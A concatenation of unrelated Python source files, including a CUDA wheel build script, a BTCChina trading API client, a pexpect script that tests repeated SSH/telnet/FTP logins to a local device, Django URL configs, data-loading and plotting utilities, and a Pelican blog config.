\$(ls /pynvvl/dist/cuda-{cuda_version}/*.whl); \ do \ echo \$file | \ sed --expression=\"s/linux/manylinux1/g\" | \ xargs -IXXX mv \$file XXX; \ done; \ "'.format( source_dir=os.getcwd(), tag=WHEEL_CONFIGS[cuda_version]['tag'], cuda_version=cuda_version, ), shell=True) for python_version, tags in PYTHON_VERSIONS.items(): print('-' * 10, 'Testing wheel for Python {}'.format(python_version), '-' * 10) package_python = '{}-{}'.format( tags['python_tag'], tags['linux_abi_tag']) # Test the wheel wheel_name = '{}-{}-{}-manylinux1_x86_64.whl'.format( 'pynvvl_cuda{}'.format(cuda_version.replace('.', '')), PYNVVL_VERSION, package_python ) subprocess.call( 'nvidia-docker run' ' --rm' ' -v {source_dir}/examples:/examples' ' -v {source_dir}/dist/cuda-{cuda_version}:/wheels' ' -t {tag}' ' bash -c' ' " \ pyenv global {python_version} && pyenv rehash && \ pip install /wheels/{wheel_name} && \ cd / && python examples/simple_load.py \ > /examples/cuda-{cuda_version}_python-{python_version}.txt && \ mv /examples/sample.png \ /examples/sample_cuda-{cuda_version}_python-{python_version}.png \ "'.format( source_dir=os.getcwd(), tag=WHEEL_CONFIGS[cuda_version]['test'], cuda_version=cuda_version, python_version=python_version, wheel_name=wheel_name, ), shell=True) # Build Docker images for cuda_version, wheel_config in WHEEL_CONFIGS.items(): build_docker_image(cuda_version, wheel_config['tag'], wheel_config['test']) # Build wheels for cuda_version, wheel_config in WHEEL_CONFIGS.items(): print('-' * 10, 'Building for CUDA {}'.format(cuda_version), '-' * 10) build_wheels(cuda_version) print('=' * 30) api/tradeapi.py #!/usr/bin/env python # -*- coding: utf-8 -*- import time import re import hmac import hashlib import base64 import httplib import json class BTCChina(): def __init__(self,access=None,secret=None,tradeType=None): self.access_key=access self.secret_key=secret self.conn=httplib.HTTPSConnection("api.btcchina.com", 443, timeout=10) self.tradeType = tradeType def _get_tonce(self): return int(time.time()*1000000) def _get_params_hash(self,pdict): pstring="" # The order of params is critical for calculating a correct hash fields=['tonce','accesskey','requestmethod','id','method','params'] for f in fields: if pdict[f]: if f == 
'params': # Convert list to string, then strip brackets and spaces # probably a cleaner way to do this param_string=re.sub("[\[\] ]","",str(pdict[f])) param_string=re.sub("'",'',param_string) pstring+=f+'='+param_string+'&' else: pstring+=f+'='+str(pdict[f])+'&' else: pstring+=f+'=&' pstring=pstring.strip('&') # now with correctly ordered param string, calculate hash phash = hmac.new(self.secret_key, pstring, hashlib.sha1).hexdigest() return phash def _private_request(self,post_data): try: #fill in common post_data parameters tonce=self._get_tonce() post_data['tonce']=tonce post_data['accesskey']=self.access_key post_data['requestmethod']='post' # If ID is not passed as a key of post_data, just use tonce if not 'id' in post_data: post_data['id']=tonce pd_hash=self._get_params_hash(post_data) # must use b64 encode auth_string='Basic '+base64.b64encode(self.access_key+':'+pd_hash) headers={'Authorization':auth_string,'Json-Rpc-Tonce':tonce} #post_data dictionary passed as JSON self.conn.request("POST",'/api_trade_v1.php',json.dumps(post_data),headers) response = self.conn.getresponse() # check response code, ID, and existence of 'result' or 'error' # before passing a dict of results if response.status == 200: # this might fail if non-json data is returned resp_dict = json.loads(response.read()) # The id's may need to be used by the calling application, # but for now, check and discard from the return dict if str(resp_dict['id']) == str(post_data['id']): if 'result' in resp_dict: return resp_dict['result'] elif 'error' in resp_dict: return resp_dict['error'] else: # not great error handling.... print "status:",response.status print "reason:",response.reason return None except Exception, e: print 'Failed to get response:' + str(e) return None def get_account_info(self,post_data={}): post_data['method']='getAccountInfo' post_data['params']=[] return self._private_request(post_data) def get_market_depth(self,post_data={}): post_data['method']='getMarketDepth2' post_data['params']=[post_data['limit'],self.tradeType] return self._private_request(post_data) def buy(self,price,amount,post_data={}): post_data['method']='buyOrder2' post_data['params']=[price,amount,self.tradeType] return self._private_request(post_data) def sell(self,price,amount,post_data={}): post_data['method']='sellOrder' post_data['params']=[price,amount,self.tradeType] return self._private_request(post_data) def cancel(self,order_id,post_data={}): post_data['method']='cancelOrder' post_data['params']=[self.tradeType,order_id] return self._private_request(post_data) def request_withdrawal(self,currency,amount,post_data={}): post_data['method']='requestWithdrawal' post_data['params']=[currency,amount] return self._private_request(post_data) def get_deposits(self,currency='BTC',pending=True,post_data={}): post_data['method']='getDeposits' if pending: post_data['params']=[currency] else: post_data['params']=[currency,''] # empty if false return self._private_request(post_data) def get_orders(self,id=None,open_only=True,post_data={}): # this combines getOrder and getOrders if id is None: post_data['method']='getOrders' if open_only: post_data['params']=[] else: post_data['params']=[''] # empty if false else: post_data['method']='getOrder' post_data['params']=[id] return self._private_request(post_data) def get_withdrawals(self,id='BTC',pending=True,post_data={}): # this combines getWithdrawal and getWithdrawls try: id = int(id) post_data['method']='getWithdrawal' post_data['params']=[id] except: post_data['method']='getWithdrawals' 
if pending: post_data['params']=[id] else: post_data['params']=[id,''] # empty if false return self._private_request(post_data) """Pylint extension with performance anti-patterns""" from typing import TYPE_CHECKING from perflint.checker import ForLoopChecker if TYPE_CHECKING: from pylint.lint import PyLinter __version__ = "0.0.1" def register(linter: "PyLinter") -> None: """This required method auto registers the checker during initialization. :param linter: The linter to register the checker to. """ linter.register_checker(ForLoopChecker(linter)) 1-10 # coding=utf-8 # Copyright 2019 Google LLC # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Football action set tests.""" import unittest from gfootball.env import football_action_set import numpy as np named_action_from_action_set = football_action_set.named_action_from_action_set class FootballActionSetTest(unittest.TestCase): def test_action_from_basic_action_set(self): action_set = football_action_set.get_action_set({'action_set': 'default'}) self.assertEqual( named_action_from_action_set(action_set, 1), football_action_set.action_left) self.assertEqual( named_action_from_action_set(action_set, 12), football_action_set.action_shot) self.assertEqual(named_action_from_action_set(action_set, np.int32(1)), football_action_set.action_left) self.assertRaises(Exception, named_action_from_action_set, action_set, np.int32(100)) self.assertEqual( named_action_from_action_set(action_set, football_action_set.action_left), football_action_set.action_left) self.assertRaises(Exception, named_action_from_action_set, action_set, 100) def test_action_set_full(self): self.assertEqual(football_action_set.full_action_set[0], football_action_set.action_idle) def test_disable_action(self): self.assertEqual( football_action_set.disable_action( football_action_set.action_left), football_action_set.action_release_direction) self.assertEqual( football_action_set.disable_action( football_action_set.action_release_direction), football_action_set.action_release_direction) def test_sticky_actions_have_release(self): for i in football_action_set.action_set_dict: action_set = football_action_set.action_set_dict[i] for action in action_set: if action._sticky: reverse = football_action_set.disable_action(action) self.assertTrue( reverse in action_set, 'Action {} has no release action in action set {}'.format( action._name, i)) if __name__ == '__main__': unittest.main() 10-100 from .clevr_executor import ClevrExecutor from functools import lru_cache def get_executor(opt, *args, **kwargs): print('| creating %s executor' % opt.dataset) graph_parser = kwargs.get('graph_parser') embedder = kwargs.get('embedder') if opt.dataset == 'clevr': train_scene_json = opt.clevr_train_scene_path if opt.is_train else None val_scene_json = opt.clevr_val_scene_path vocab_json = opt.clevr_vocab_path else: raise ValueError('Invalid dataset') executor = ClevrExecutor(train_scene_json, val_scene_json, vocab_json, graph_parser=graph_parser, embedder=embedder) return executor def get_executor_orig(opt): print('| 
creating %s executor' % opt.dataset) if opt.dataset == 'clevr': train_scene_json = opt.clevr_train_scene_path val_scene_json = opt.clevr_val_scene_path vocab_json = opt.clevr_vocab_path else: raise ValueError('Invalid dataset') executor = ClevrExecutor(train_scene_json, val_scene_json, vocab_json) return executorHuajunZhou-TJ/onsite0 from .env_openx import EnvOpenx def make(path): env = EnvOpenx() observation = env.init(path) return env,observationbackend/whatsapp/main/urls.py from django.urls import include, path from rest_framework import routers from .views import CustomUserViewSet from .views import RegistrationView from .views import OTPValidationView from .views import index from .views import room router = routers.DefaultRouter() router.register(r'', CustomUserViewSet) urlpatterns = [ # path('', include(router.urls)), path('', index, name='index'), path('chat//', room, name='room'), path(r'register', RegistrationView.as_view()), path(r'validate-otp', OTPValidationView.as_view()), path('api-auth/', include('rest_framework.urls', namespace='rest_framework')) ] #!/usr/bin/env python # -*- coding: utf-8 -*- ''' * Copyright (c) 2009-~ * * Author: <> * Created Time: Sat 30 Jan 2016 11:33:50 AM CST * File Name: sys_fun_test.py * * Description: ''' import pexpect import threading import os,sys,time import multiprocessing Debug = 0 Manual = 0 #Test case switch. '1':on ;'0':off TestTelnet = 0 TestSsh = 1 TestFtp = 0 # Repeat times GetTimes = sys.argv[1] RepeatTimes = int(GetTimes) # Time Interval of starting threads TimeInterval = 0.2 # Ssh port number SshPort = '22' # Remote host IP address IpAddress = '192.168.3.11' # Username for login LoginName = 'admin' # Password for login LoginPassword = '' # Prompt such as:’ $ ’ , ‘ # ’ or ’ > ’ LoginPrompt = '[$#>]' PasswordPrompt = 'admin@'+IpAddress+'\'s password:' #Need to be optimized by using process pool def main(num): #define thread pool threads = [] #greate thread objects if ( TestTelnet == 1 ): for i in range(num): threads.append(threading.Thread(target=telnet_cmd, args=(IpAddress,LoginPassword,tel_list))) if TestSsh is 1: for i in range(0,num): threads.append(threading.Thread(target=ssh_cmd, args=(IpAddress,LoginPassword,ssh_list))) if TestFtp is 1: for i in range(0,num): threads.append(threading.Thread(target=ftp_cmd, args=(IpAddress,LoginPassword,ftp_list))) #start all threads for t in range(len(threads)): threads[t].start() time.sleep(TimeInterval) #The main thread waits for all sub thread exits for t in range(len(threads)): threads[t].join() def telnet_cmd(IpAddress,LoginPassword,tel_list): cmd = 'telnet ' + IpAddress # 为 telnet 生成 spawn 类子程序 telnet = pexpect.spawn(cmd) # 期待'login'字符串出现,从而接下来可以输入用户名 mylist = telnet.expect(["login", "(?i)Unknown host", pexpect.EOF, pexpect.TIMEOUT]) if ( mylist == 0 ): # 匹配'login'字符串成功,输入用户名. telnet.sendline(LoginName) # 期待 "[pP]assword" 出现. mylist2 = telnet.expect(["[pP]assword", pexpect.EOF, pexpect.TIMEOUT]) # 匹配 "[pP]assword" 字符串成功,输入密码. telnet.sendline(LoginPassword) # 期待提示符出现. telnet.expect(LoginPrompt) if (mylist2 == 0): # 匹配提示符成功,输入执行命令 '\n' telnet.sendline('\n') # 期待提示符出现. telnet.expect(LoginPrompt) tel_list.append(1) if Debug == 0: pass else: print 'Congratulations! telnet login correct!' if Manual == 1: telnet.interact() else: if TimeInterval == 0: time.sleep(10) else: time.sleep(RepeatTimes*TimeInterval+5) # 匹配到了 pexpect.EOF 或 pexpect.TIMEOUT,表示超时或者 EOF,程序打印提示信息并退出. elif (mylist2 == 1): tel_list.append(2) if Debug == 0: pass else: print "Telnet login failed, due to EOF!!!" 
elif(mylist2 == 2): tel_list.append(3) if Debug == 0: pass else: print "Telnet login failed, due to TIMEOUT!!!" else: tel_list.append(0) telnet.close(force=True) # 匹配到了 pexpect.EOF 或 pexpect.TIMEOUT,表示超时或者 EOF,程序打印提示信息并退出. elif (mylist == 1): tel_list.append(0) if Debug == 0: pass else: print "Telnet login failed, due to Unknown host!!!" elif(mylist == 2): tel_list.append(2) if Debug == 0: pass else: print "Telnet login failed, due to EOF!!!" elif(mylist == 3): tel_list.append(3) if Debug == 0: pass else: print "Telnet login failed, due to TIMEOUT!!!" else: tel_list.append(0) if Debug == 0: pass else: print "Telnet login failed, due to Others!!!" telnet.close() def ssh_cmd(IpAddress,LoginPassword,ssh_list): cmd = 'ssh '+LoginName+'@' + IpAddress+' -p '+SshPort # 为 ssh 生成 spawn 类子程序 ssh = pexpect.spawn(cmd) # 期待'passwd'字符串出现,从而接下来可以输入密码 mylist = ssh.expect(['password:','Are you sure you want to continue connecting (yes/no)?', pexpect.EOF,pexpect.TIMEOUT],timeout=5) if mylist == 0 : ssh.sendline(LoginPassword) ssh_list.append(1) if Debug == 0: pass else: print 'Congratulations! ssh login correct!' if Manual == 1: telnet.interact() else: if TimeInterval == 0: time.sleep(10) else: time.sleep(RepeatTimes*TimeInterval+5) elif mylist == 1: ssh.sendline('yes\n') ssh.expect('password: ') ssh.sendline(LoginPassword) ssh.sendline('\n') ssh_list.append(1) elif mylist == 2: ssh_list.append(2) if Debug == 0: pass else: print "Ssh login failed, due to EOF!!!" elif mylist == 3: ssh_list.append(3) if Debug == 0: pass else: print "Ssh login failed, due to TIMEOUT!!!" ssh.close() def ftp_cmd(IpAddress,LoginPassword,ftp_list): # 拼凑 ftp 命令 cmd = 'ftp ' + IpAddress # 利用 ftp 命令作为 spawn 类构造函数的参数,生成一个 spawn 类的对象 ftp = pexpect.spawn(cmd) # 期望具有提示输入用户名的字符出现 mylist = ftp.expect(["(?i)name", "(?i)Unknown host", pexpect.EOF, pexpect.TIMEOUT]) # 匹配到了 "(?i)name",表明接下来要输入用户名 if ( mylist == 0 ): # 发送登录用户名 + 换行符给子程序. ftp.sendline(LoginName) # 期望 "(?i)password" 具有提示输入密码的字符出现. mylist = ftp.expect(["(?i)password", pexpect.EOF, pexpect.TIMEOUT]) ftp.sendline(LoginPassword) # 期望登录成功后,提示符 "ftp>" 字符出现. mylist = ftp.expect( ['ftp>', 'Login incorrect', 'Service not available', pexpect.EOF, pexpect.TIMEOUT]) # 匹配到了 'ftp>',登录成功. if (mylist == 0): ftp_list.append(1) if Debug == 0: pass else: print 'Congratulations! ftp login correct!' if Manual == 1: telnet.interact() else: if TimeInterval == 0: time.sleep(10) else: time.sleep(RepeatTimes*TimeInterval+5) elif (mylist2 == 1): ftp_list.append(2) if Debug == 0: pass else: print "Telnet login failed, due to EOF!!!" elif(mylist2 == 2): ftp_list.append(3) if Debug == 0: pass else: print "Telnet login failed, due to TIMEOUT!!!" else: ftp_list.append(0) # 匹配到了 pexpect.EOF 或 pexpect.TIMEOUT,表示超时或者 EOF,程序打印提示信息并退出 elif mylist == 3 : ftp_list.append(2) if Debug == 0: pass else: print "ftp login failed, due to EOF!!!" elif mylist == 4: ftp_list.append(3) if Debug == 0: pass else: print "ftp login failed, due to TIMEOUT!!!" 
else: ftp_list.append(0) if Debug == 0: pass else: print "ftp login failed, due to Others" ftp.close() if __name__ == '__main__': try: tel_list = [0] ssh_list = [0] ftp_list = [0] main(RepeatTimes) if TestTelnet is 1: print '=============================' print '====== Telnet Resoult ======' print 'Success times : ',tel_list.count(1) print 'Timeout times : ',tel_list.count(3) print 'EOF times : ',tel_list.count(2) print '=============================' if TestSsh is 1: print '=============================' print '======== Ssh Resoult ========' print 'Success times : ',ssh_list.count(1) print 'Timeout times : ',ssh_list.count(3) print 'EOF times : ',ssh_list.count(2) print '=============================' if TestFtp is 1: print '=============================' print '======== Ftp Resoult ========' print 'Success times : ',ftp_list.count(1) print 'Timeout times : ',ftp_list.count(3) print 'EOF times : ',ftp_list.count(2) print '=============================' except Exception, e: print str(e) os._exit(1) from django.contrib import admin from .models import Household from .models import MetertypeHousehold from .models import UserHousehold admin.site.register(Household) admin.site.register(MetertypeHousehold) admin.site.register(UserHousehold) """ Mutatio SD-daten Auswertung by """ import matplotlib.pyplot as plt import matplotlib.dates as md import numpy as np import datetime as dt import time import matplotlib.patches as patches import matplotlib.path as path #simply plot a file, no adjustments: #plt.plotfile('/Users/daedae/PycharmProjects/test/netzsinus/2016067.txt', delimiter='\t', cols=(0, 1), # names=('Frequenz', 'Zeit'), marker='o') #plt.show() #plot a file with possibility to reformat the data #enter path to your file here with open('/Users/daedae/PycharmProjects/test/netzsinus/2016059_eu.txt') as f: data = f.read().splitlines() timestamps = [row.split('\t')[0] for row in data] timestamps = np.array(timestamps).astype(np.float) #make floats from strings frequency = [row.split('\t')[1] for row in data] frequency = np.array(frequency).astype(np.float) #make floats from strings quality = [row.split('\t')[2] for row in data] quality = np.array(quality).astype(np.int) #make integers from strings datetimestamps = [dt.datetime.fromtimestamp(idx) for idx in timestamps] #Mutatio code bug (is fixed now): overflows erkennen und bereinigen for i in range(1, len(frequency)): if(frequency[i]>50.2 and frequency[i-1] < 49.8): #underflow value while(frequency[i] > 50.0): frequency[i] = frequency[i]-0.65536 i += 1 if(frequency[i]<49.8 and frequency[i-1] > 50.2): #overflow value while(frequency[i] < 50.0): frequency[i] = frequency[i]+0.65536 i += 1 fig = plt.figure(1) ax = fig.add_subplot(111) ax.set_title("Grid Frequency") #ax1.set_xlabel('Zeit') ax.set_ylabel('Frequency') plt.subplots_adjust(bottom=0.3) plt.xticks( rotation=25 ) ax=plt.gca() xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S') ax.xaxis.set_major_formatter(xfmt) ax.plot(datetimestamps,frequency, c='b', label='Frequency') #leg = ax1.legend() #show the legend label plt.show() #histogramm und fourier analyse: fig = plt.figure(2) plt.subplots_adjust(hspace=0.4) ax = fig.add_subplot(211) #plt.subplots() # histogram our data with numpy n, bins = np.histogram(frequency, 1000) # get the corners of the rectangles for the histogram left = np.array(bins[:-1]) right = np.array(bins[1:]) bottom = np.zeros(len(left)) top = bottom + n ax.axes.get_yaxis().set_visible(False) #disable drawing the y axis # we need a (numrects x numsides x 2) numpy array for the path 
helper # function to build a compound path XY = np.array([[left, left, right, right], [bottom, top, top, bottom]]).T # get the Path object barpath = path.Path.make_compound_path_from_polys(XY) # make a patch out of it patch = patches.PathPatch( barpath, facecolor='gold', edgecolor='gold', alpha=0.8) ax.add_patch(patch) # update the view limits ax.set_xlim(left[0], right[-1]) ax.set_ylim(bottom.min(), top.max()+top.max()*0.05) ax.set_title("Frequency Distribution") #plt.show() #fourier analysis #the problem is uneven spaced time data, lets make it one value per second data using cubic interpolation from scipy.interpolate import interp1d from scipy.fftpack import fft frequency_interp = interp1d(timestamps, frequency) #, kind='cubic' timestamps_interp = np.linspace(timestamps[0], timestamps[-1], int(timestamps[-1] - timestamps[0]), endpoint=True) #now we have interpolated data, do the FFT # Number of samplepoints N = int(timestamps[-1] - timestamps[0]) # sample spacing T = 1.0 #1Hz or 1 sample per second x = np.linspace(0.0, N*T, N) yf = fft(frequency_interp(timestamps_interp)) xf = np.linspace(0.0, T,N,endpoint=True) #xf = np.linspace(timestamps[0], timestamps[-1], int(timestamps[-1] - timestamps[0]), endpoint=True) ax = fig.add_subplot(212) ax.set_title("Fourier analysis of Frequency") ax.set_xlabel('Oscillations in the Frequency in [Hz]') #ax.set_yscale('log') ax.axes.get_yaxis().set_visible(False) #disable drawing the y axis ax.axes.get_yaxis().set_visible(True) #disable drawing the y axis plt.plot(xf[N/15:N/2],np.abs(yf[N/15:N/2]), c='r') plt.grid() plt.show() import pandas as pd def tokenize_array(supports): tokens = [] for support in supports: tokens.extend(tokenizer.tokenize(support)) tokens.append(tokenizer.sep_token) return tokens def load_summaries(): summaries = pd.read_csv('narrativeqa/summaries.csv', sep=',') train = summaries.loc[summaries['set'] == 'train'] test = summaries[summaries['set'] == 'test'] return train[['document_id', 'summary']], test[['document_id', 'summary']] def load_train(): """ Load data in from narrativeqa. """ qa = pd.read_csv('narrativeqa/qaps.csv', sep=',') train = qa.loc[qa['set'] == 'train'] test = qa[qa['set'] == 'test'] train_x = train[['document_id', 'question']] train_y = train[['answer1', 'answer2']] test_x = test[['document_id', 'question']] test_y = test[['answer1', 'answer2']] return train_x, train_y, test_x, test_y twa127/Adafruit_Blinkasrc/adafruit_blinka/board/qtpy_u2if.py100-1000 """ Pin definitions for the QT Py RP2040 with u2if firmware. Adafruit CircuitPython 6.2.0 on 2021-04-05; Adafruit QTPy RP2040 with rp2040 >>> import board >>> board. A0 A1 A2 A3 BUTTON D0 D1 D10 D2 D3 D4 D5 D6 D7 D8 D9 I2C MISO MOSI NEOPIXEL NEOPIXEL_POWER RX SCK SCL SCL1 SDA SDA1 SPI TX UART """ from adafruit_blinka.microcontroller.rp2040_u2if import pin D0 = pin.GP29 D1 = pin.GP28 D2 = pin.GP27 D3 = pin.GP26 D4 = pin.GP24 D5 = pin.GP25 D6 = pin.GP20 D7 = pin.GP5 D8 = pin.GP6 D9 = pin.GP4 D10 = pin.GP3 # A0 = pin.GP29 # not currently supported in firmware A1 = pin.GP28 A2 = pin.GP27 A3 = pin.GP26 SCL = pin.GP25 SDA = pin.GP24 SCL1 = pin.GP23 SDA1 = pin.GP22 SCLK = SCK = pin.GP6 MOSI = pin.GP3 MISO = pin.GP4 NEOPIXEL = pin.GP12 NEOPIXEL_POWER = pin.GP11 BUTTON = pin.GP21 # access u2if via pin instance to open for specifc VID/PID # pylint:disable = protected-access pin.GP0._u2if_open_hid(0x239A, 0x00F7) 100-1000 import numbers import numpy as np from . import color as color_module from . 
import draw as draw_module def label_colormap(n_label=256, value=None): """Label colormap. Parameters ---------- n_labels: int Number of labels (default: 256). value: float or int Value scale or value of label color in HSV space. Returns ------- cmap: numpy.ndarray, (N, 3), numpy.uint8 Label id to colormap. """ def bitget(byteval, idx): shape = byteval.shape + (8,) return np.unpackbits(byteval).reshape(shape)[..., -1 - idx] i = np.arange(n_label, dtype=np.uint8) r = np.full_like(i, 0) g = np.full_like(i, 0) b = np.full_like(i, 0) i = np.repeat(i[:, None], 8, axis=1) i = np.right_shift(i, np.arange(0, 24, 3)).astype(np.uint8) j = np.arange(8)[::-1] r = np.bitwise_or.reduce(np.left_shift(bitget(i, 0), j), axis=1) g = np.bitwise_or.reduce(np.left_shift(bitget(i, 1), j), axis=1) b = np.bitwise_or.reduce(np.left_shift(bitget(i, 2), j), axis=1) cmap = np.stack((r, g, b), axis=1).astype(np.uint8) if value is not None: hsv = color_module.rgb2hsv(cmap.reshape(1, -1, 3)) if isinstance(value, float): hsv[:, 1:, 2] = hsv[:, 1:, 2].astype(float) * value else: assert isinstance(value, int) hsv[:, 1:, 2] = value cmap = color_module.hsv2rgb(hsv).reshape(-1, 3) return cmap def label2rgb( label, image=None, alpha=0.5, label_names=None, font_size=30, thresh_suppress=0, colormap=None, loc="rb", font_path=None, ): """Convert label to rgb. Parameters ---------- label: numpy.ndarray, (H, W), int Label image. image: numpy.ndarray, (H, W, 3), numpy.uint8 RGB image. alpha: float, or list or dict of float Alpha of RGB (default: 0.5). If given as a list or dict, it is treated as alpha for each class according to the index or key. label_names: list or dict of string Label id to label name. font_size: int Font size (default: 30). thresh_suppress: float Threshold of label ratio in the label image. colormap: numpy.ndarray, (M, 3), numpy.uint8 Label id to color. By default, :func:`~imgviz.label_colormap` is used. loc: string Location of legend (default: 'rb'). 'centroid', 'lt' and 'rb' are supported. font_path: str Font path. Returns ------- res: numpy.ndarray, (H, W, 3), numpy.uint8 Visualized image. 
""" if colormap is None: colormap = label_colormap() res = colormap[label] random_state = np.random.RandomState(seed=1234) mask_unlabeled = label < 0 res[mask_unlabeled] = random_state.rand(*(mask_unlabeled.sum(), 3)) * 255 unique_labels = np.unique(label) max_label_id = unique_labels[-1] if isinstance(alpha, numbers.Number): alpha = np.array([alpha for _ in range(max_label_id + 1)]) elif isinstance(alpha, dict): alpha = np.array([alpha.get(l, 0.5) for l in range(max_label_id + 1)]) else: alpha = np.asarray(alpha) assert alpha.ndim == 1 assert ((0 <= alpha) & (alpha <= 1)).all() alpha = alpha[label][:, :, None] if image is not None: if image.ndim == 2: image = color_module.gray2rgb(image) res = (1 - alpha) * image.astype(float) + alpha * res.astype(float) res = np.clip(res.round(), 0, 255).astype(np.uint8) if label_names is None: return res unique_labels = unique_labels[unique_labels != -1] if isinstance(label_names, dict): unique_labels = [l for l in unique_labels if label_names.get(l)] else: unique_labels = [l for l in unique_labels if label_names[l]] if len(unique_labels) == 0: return res if loc == "centroid": for label_i in unique_labels: mask = label == label_i if 1.0 * mask.sum() / mask.size < thresh_suppress: continue y, x = np.array(_center_of_mass(mask), dtype=int) if label[y, x] != label_i: Y, X = np.where(mask) point_index = np.random.randint(0, len(Y)) y, x = Y[point_index], X[point_index] text = label_names[label_i] height, width = draw_module.text_size( text, size=font_size, font_path=font_path ) color = color_module.get_fg_color(res[y, x]) res = draw_module.text( res, yx=(y - height // 2, x - width // 2), text=text, color=color, size=font_size, font_path=font_path, ) elif loc in ["rb", "lt"]: text_sizes = np.array( [ draw_module.text_size( label_names[l], font_size, font_path=font_path ) for l in unique_labels ] ) text_height, text_width = text_sizes.max(axis=0) legend_height = text_height * len(unique_labels) + 5 legend_width = text_width + 20 + (text_height - 10) height, width = label.shape[:2] legend = np.zeros((height, width, 3), dtype=np.uint8) if loc == "rb": aabb2 = np.array([height - 5, width - 5], dtype=float) aabb1 = aabb2 - (legend_height, legend_width) elif loc == "lt": aabb1 = np.array([5, 5], dtype=float) aabb2 = aabb1 + (legend_height, legend_width) else: raise ValueError("unexpected loc: {}".format(loc)) legend = draw_module.rectangle( legend, aabb1, aabb2, fill=(255, 255, 255) ) alpha = 0.5 y1, x1 = aabb1.round().astype(int) y2, x2 = aabb2.round().astype(int) res[y1:y2, x1:x2] = ( alpha * res[y1:y2, x1:x2] + alpha * legend[y1:y2, x1:x2] ) for i, l in enumerate(unique_labels): box_aabb1 = aabb1 + (i * text_height + 5, 5) box_aabb2 = box_aabb1 + (text_height - 10, text_height - 10) res = draw_module.rectangle( res, aabb1=box_aabb1, aabb2=box_aabb2, fill=colormap[l] ) res = draw_module.text( res, yx=aabb1 + (i * text_height, 10 + (text_height - 10)), text=label_names[l], size=font_size, font_path=font_path, ) else: raise ValueError("unsupported loc: {}".format(loc)) return res def _center_of_mass(mask): assert mask.ndim == 2 and mask.dtype == bool mask = 1.0 * mask / mask.sum() dx = np.sum(mask, 0) dy = np.sum(mask, 1) cx = np.sum(dx * np.arange(mask.shape[1])) cy = np.sum(dy * np.arange(mask.shape[0])) return cy, cx from rdkit import Chem from rdkit.Chem import AllChem from rdkit.Chem import DataStructs import numpy as np classes = {'(A) low':0, '(B) medium':1, '(C) high':2 } rclasses = {0:'(A) low', 1:'(B) medium', 2: '(C) high'} def mol2fp(mol): fp = 
AllChem.GetMorganFingerprintAsBitVect(mol, 2) arr = np.zeros((0,)) DataStructs.ConvertToNumpyArray(fp, arr) return arr def make_data(sdf): mols = [m for m in Chem.SDMolSupplier(sdf) if m !=None] X = np.array([mol2fp(m) for m in mols]) Y = [classes[m.GetProp('SOL_classification')] for m in mols] Y = np.array(Y) return (X, Y) jernejule/iMaps """Base validation.""" import datetime import os VALID_BED_EXTENSIONS = ( ".bed", ".bed.gz", ) VALID_BAM_EXTENSIONS = ( ".bam", ".sam", ) def validate_bed_file(fname, check_exist=False): """Validate BED file.""" if not fname.endswith(VALID_BED_EXTENSIONS): raise ValueError(f"Bed file {fname} should have a valid bed extension.") if check_exist and not os.path.isfile(fname): raise ValueError(f"Bed file {fname} does not exist.") def validate_bam_file(fname, check_exist=False): """Validate BAM file.""" if not fname.endswith(VALID_BAM_EXTENSIONS): raise ValueError(f"Bam file {fname} should have a valid bam extension.") if check_exist and not os.path.isfile(fname): raise ValueError(f"Bam file {fname} does not exist.") def validate_string(value, choices=None, allow_empty=False): """Validate string.""" if not value and allow_empty: return if not isinstance(value, str): raise ValueError(f"Value {value} should be a string.") if choices and value not in choices: choices_ = ", ".join(choices) raise ValueError(f"Value {value} should be one of {choices_}.") def validate_integer(value): """Validate integer.""" if not isinstance(value, int): raise ValueError(f"Value {value} should be an integer.") def validate_date(value, allow_empty=False): """Validate date format.""" if not value and allow_empty: return try: datetime.datetime.strptime(value, "%Y-%m-%d") except ValueError: raise ValueError(f"Incorrect date format ({value}), should be YYYY-MM-DD.") from django.urls import path, include from rest_framework.routers import DefaultRouter from post import views router = DefaultRouter() router.register('tags', views.TagViewSet) router.register('posts', views.PostViewSet) router.register('comments', views.CommentViewSet) app_name = 'post' urlpatterns = [ path('', include(router.urls)) ] #!/usr/bin/env python # -*- coding: utf-8 -*- # from __future__ import unicode_literals AUTHOR = u'tutysara' SITENAME = u"tutysara's space" #SITEURL = 'http://localhost:8080' SITEURL = 'http://www.tutysara.net' # Uncomment following line if you want document-relative URLs when developing #RELATIVE_URLS = True TIMEZONE = 'Asia/Calcutta' DEFAULT_LANG = u'en' # Feed generation is usually not desired when developing FEED_ALL_ATOM = 'feeds/all.rss.xml' CATEGORY_FEED_ATOM = 'feeds/%s.rss.xml' TRANSLATION_FEED_ATOM = None # Blogroll #LINKS = (('Pelican', 'http://getpelican.com/'), # ('Python.org', 'http://python.org/'), # ('Jinja2', 'http://jinja.pocoo.org/'), # ('You can modify those links in your config file', '#'),) # Social widget SOCIAL = (('@tutysara', 'http://twitter.com/tutysara', 'icon-twitter'), ('github', 'http://github.com/tutysara', 'icon-github'), ('+tutysara', 'https://plus.google.com/113376160578552687607/posts', 'icon-google-plus'),) SOCIAL_OLD = (('twitter', 'http://twitter.com/tutysara'), ('github', 'http://github.com/tutysara'), ('google-plus', 'https://plus.google.com/113376160578552687607/posts'),) DEFAULT_PAGINATION = 3 # boot strap theme specific TAG_CLOUD_STEPS = 4 TAG_CLOUD_MAX_ITEMS = 10 DISPLAY_CATEGORIES_ON_MENU = False MARKUP = ('markdown', 'md' , 'htm', 'html',) DEFAULT_CATEGORY = ('Articles') # my customizations COPY_RIGHT_STRING = "Copyright 2013, tutysara Powered by 
